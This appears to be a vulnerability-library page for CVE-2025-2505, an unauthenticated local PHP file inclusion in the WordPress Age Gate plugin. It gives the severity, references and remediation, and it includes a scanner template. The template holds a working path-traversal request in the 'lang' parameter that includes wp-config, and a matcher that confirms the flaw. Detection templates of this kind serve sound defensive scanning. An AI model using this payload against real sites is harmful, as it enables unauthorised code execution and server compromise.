/Vulnerability Library

WordPress Age Gate <= 3.5.3 - Unauthenticated Local File Inclusion

CVE-2025-2505
Verified

Description

The Age Gate plugin for WordPress up to version 3.5.3 contains a local PHP file inclusion caused by the 'lang' parameter, letting unauthenticated attackers include and execute arbitrary PHP files, exploit requires no authentication.

Severity

Critical

CVSS Score

9.8

Exploit Probability

1%

Published Date

May 7, 2026

Template Author

pussycat0x

CVE-2025-2505.yaml
id: CVE-2025-2505

info:
  name: WordPress Age Gate <= 3.5.3 - Unauthenticated Local File Inclusion
  author: pussycat0x
  severity: critical
  description: |
    The Age Gate plugin for WordPress up to version 3.5.3 contains a local PHP file inclusion caused by the 'lang' parameter, letting unauthenticated attackers include and execute arbitrary PHP files, exploit requires no authentication.
  impact:
    Attackers can execute arbitrary PHP code on the server, potentially leading to full server compromise.
  remediation:
    Update to the latest version of the plugin, version 3.5.4 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/age-gate/age-gate-353-unauthenticated-local-php-file-inclusion-via-lang
    - https://plugins.trac.wordpress.org/changeset/3271222/age-gate
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-2505
    cwe-id: CWE-98
    epss-score: 0.01229
    epss-percentile: 0.65918
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2025,wordpress,wp-plugin,age-gate,lfi,wp,vkev

http:
  - raw:
      - |
        GET /?rest_route=/age-gate/v3/check HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /?rest_route=/age-gate/v3/check&age_gate[lang]=../../../../../../../../wp-config HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200"
          - "contains(body_1, 'age_gate')"
          - "contains(body_2, 'DB_NAME already defined')"
        condition: and
# digest: 4b0a00483046022100c8ad151105434b78c3f24a2cc692604e21ecc24ff41f12521857a0132b4b1365022100913a3e0ea28370e27bd516fee682857727527fe65c8e6fe11b00635b4282ec52:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2025-2505
CWE ID:
cwe-98

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/age-gate/age-gate-353-unauthenticated-local-php-file-inclusion-via-langhttps://plugins.trac.wordpress.org/changeset/3271222/age-gate

Remediation Steps

Update to the latest version of the plugin, version 3.5.4 or later.